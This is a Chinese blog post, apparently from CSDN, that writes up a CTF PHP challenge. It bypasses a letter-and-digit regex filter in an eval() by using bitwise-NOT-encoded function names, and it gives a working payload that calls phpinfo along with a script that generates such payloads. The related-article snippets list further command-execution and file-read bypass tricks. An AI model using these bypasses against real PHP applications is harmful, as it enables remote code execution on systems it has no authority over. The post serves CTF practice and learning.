CTF赛题PHP7 正则绕过

最新推荐文章于 2024-06-01 16:25:22 发布
最新推荐文章于 2024-06-01 16:25:22 发布
阅读量2.5k 收藏 4
点赞数
分类专栏: CTF安全 文章标签: php 正则表达式 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kelenwait/article/details/119810759
版权

题目为ctf web中php正则绕过题

前言:由于长度限制,且不像其他题目告知flag.php的内容, 笔者并没有求出flag,绕过思路可参考,也欢迎ctf大佬指点迷津。

题目如下,解析flag.php中的flag变量

<?php
include("flag.php");
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>20){
        die("Too Long.");
    }
    if(preg_match("/[A-Za-z0-9_]+/",$code)){
        die("Not Allowed.");
    }
    @eval($code);
}else{
    highlight_file(__FILE__);
}

解题思路

1.题目不告知flag.php的内容,所以唯一的办法只有打印出flag.php,先想办法绕过

2.因为_也在正则里面,所以 =${_GET}[_]();&_=phpinfo()没办法传入

3.尝试php7 中的($a)();来执行动态函数 例如 (‘phpinfo’)()

4.那么动态构造函数名称即可,可理解,假如你是:(1+1)(); php会先运算1+1=2 然后在调用:2();

5.借助大牛的payload (~%8F%97%8F%96%91%99%90)();成功执行

6.payload构造方式如下

<?php
$a = 'phpinfo';
$b=~$a;
echo ~$a;
echo "------";
echo urlencode($b);

** 如何理解? **
对执行的函数取反然后进行 urlencode 详细可自行科普

7.当前可执行phpinfo,如何获取flag.php的内容?思路继续扩展

  • a.使用php中的 system 或者exec 函数进行执行系统命令
  • b.弹shell? 绕不过长度限制
  • c.使用file()函数读取文件,需要联合var_dump或者print_r,绕不过长度

以上均是长度限制 笔者解题终于此

扩展 已经只flag.php文件的情况下 例如

<?php
	function getFlag(){
		$flag = "111111111111111111";
		echo $flag;
};
?>

那么只需要 执行getFlag()函数即可
('getFlag')();对flag进行编码

以上就是笔者对php绕过的小理解和内容分享

参考文章:http://www.ttk7.cn/post-121.html

欢迎讨论,持续更新中,感谢关注

烽铃子
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF web总结--绕过则表达式
bob的博客
08-30 1万+
绕过则表达式
【红日Day6-CTFPHP绕过
PZ的博客
01-12 2173
练习记录 复现代码: index.php // index.php <?php include 'flag.php'; if ("POST" == $_SERVER['REQUEST_METHOD']) { $password = $_POST['password']; if (0 >= preg_match('/^[[:graph:]]{12,}$/', $pass...
CTF 命令执行绕过总结
最新发布
jnszstmei的博客
06-01 398
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示。或:rce-xor-or.php & rce-xor-or.py。# ls -t >shell 将输出输入到shell文件中。异或:rce-xor.php & rce-xor.py。%09(url传递)(cat%09flag.php)sh /flag 2>%261 //报错出文件内容。2、1使用空变量$*和$@,$x,${x}绕过。7、异或无符号(过滤0-9a-zA-Z)more:一页一页的显示档案内容。
绕过
v_wus的博客
05-12 1297
绕过 一、preg_match() 1.异或绕过 使用异或绕过:可以使用各种特殊字符的异或构造出字母和数字 str = r"~!@#$%^&*()_+<>?,.;:-[]{}\/" for i in range(0, len(str)): for j in range(0, len(str)): a = ord(str[i])^ord(str[j]) print(str[i] + ' ^ ' + str[j] + ' is ' + chr(a
浅析CTF绕过字符数字构造shell
蚁景网安学院
12-14 3614
CTF中,虽然有很多文章有这方面的资料,但是相对来说比较零散,这里主要把自己学习和打ctf遇到的一些绕过字符数字构造shell梳理一下。
BugkuCTF-字符?则?,各种绕过,细心,urldecode二次编码绕过
veinard_F的博客
05-04 1536
字符?则? 打开目后出现一段代码 大致分析会发现需找到一个id满足前面的匹配才可以输出$key,即flag,本主要考察有关则表达式的内容。 “/key.*key.{4,7}key:/./(.*key)[a-z][[:punct:]]/i” 分析上述代码,首先需要一个key,而 . 表示匹配一个除换行符以外的所有字符,可以任意选择,比如a; * 表示匹配前面一个字符大于等于0次,为了简便选...
PCRE绕过
Aiwin的博客
06-19 954
PCRE绕过则和例[NISACTF 2022]middlerce
整理自己做过的关于RealWorld的CTF.zip
10-25
整理自己做过的关于RealWorld的CTF
ctf设计说明1
08-04
ctf设计说明1
ctf设计说明2
08-04
这篇内容是关于CTF(Capture The Flag)设计的说明,主要涉及了两个关键知识点:AES加密模式和自定义登录协议。让我们详细探讨这两个主。 首先,AES(Advanced Encryption Standard)是一种广泛使用的对称...
CTF:将txt文件提取转换为图片(二维码)
10-20
提取txt文档中的大量0和1,生成二维码
ctf-攻防世界-web:Web_php_include
一只菜鸟的博客
11-21 5752
先看目标php_include,猜测为文件包含漏洞。 打开环境,看到这样一段代码:
XCTF-攻防世界CTF平台-Web类——13、Web_php_unserialize(php反序列化漏洞绕过__wakeup()函数、则表达式)
Onlyone_1314的博客
11-27 1120
打开目地址: 这也是一个php反序列化的目 源代码: <?php /** * 定义一个demo类 * / class Demo { # 初始化$file变量的默认值是index.php private $file = 'index.php'; # 类初始化的时候的构造函数,初始化当前对象的页面 public function __construct($file) { $this->file = $file; } # 对象销毁之前的析构函数,高
[NISACTF 2022]middlerce-----则匹配回溯绕过
qq_73767109的博客
06-26 783
要匹配的第一个字符与字符串中的第一个进行匹配,如果匹配成功就一直匹配下去,直至匹配不成功就到第二个要匹配的字符,如果第二个匹配的字符成功了就一直匹配下去,如果不成功就吐出原匹配好的字符串最右边的一个字符进行匹配,如果还不成功就继续吐,直至匹配成功才到下一个要匹配的字符,但是我们知道,既然前一个匹配的字符成功了就肯定不符合下一个匹配的字符。2.到a这个字符从后面往前回溯匹配,先吐出一个d但匹配不上,继续吐出一个s,sd还是与a匹配不上。这个字符表示可以匹配任意的字符,那么按上面说的匹配机制,
[极客大挑战 2019]RCE ME 取反绕过则匹配 绕过disable_function设置
m0_64180167的博客
09-22 746
有意思。。。。过滤了数字字母我们要绕过并且执行rce这里使用取反和异或都可以。
常见php函数绕过
huangyongkang666的博客
03-31 4125
PHP常见函数介绍 1. is_numeric() 函数 作用:检测变量是否为数字或数字字符串。 PHP 版本要求:PHP 4, PHP 5, PHP 7 is_numeric函数对于空字符%00,无论是%00放在前后都可以判断为非数值,而%20空格字符只能放在数值后 绕过: ?what=1' ?what=1, ?what=1%00 2.isset函数 **作用:**检测变量是否设置 格式:bool isset ( mixed var [, mixed var [, …]] ) 返回值: 若变量不存在则返
rce漏洞,涉及函数及绕过
2202_75361164的博客
09-18 324
rce漏洞,涉及函数以及绕过
ctfshow PHP特性(89-115)【学习记录】
ximo的博客
02-17 548
web 89 include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } intval() 函数用于获取变量的整数值。 但是要绕过
CTFshow——文件包含
D.MIND 的博客
02-07 2139
web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 这里有个include文件包含。利用Filter机制,构造php://filter/convert.base64-encode/resource=×××的攻击数据读取文件,拿到各种文件的源码 payload: ?file=php://filter/conv
网络功防大ctf
07-24
网络攻防大CTF是一种网络安全竞模式,目的是锻炼参者在信息安全技术上的实战能力。CTF即Capture The Flag,中文就是抓住旗帜的意思。 CTF通常包含各种各样的安全问,例如密码学、网络安全、移动...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值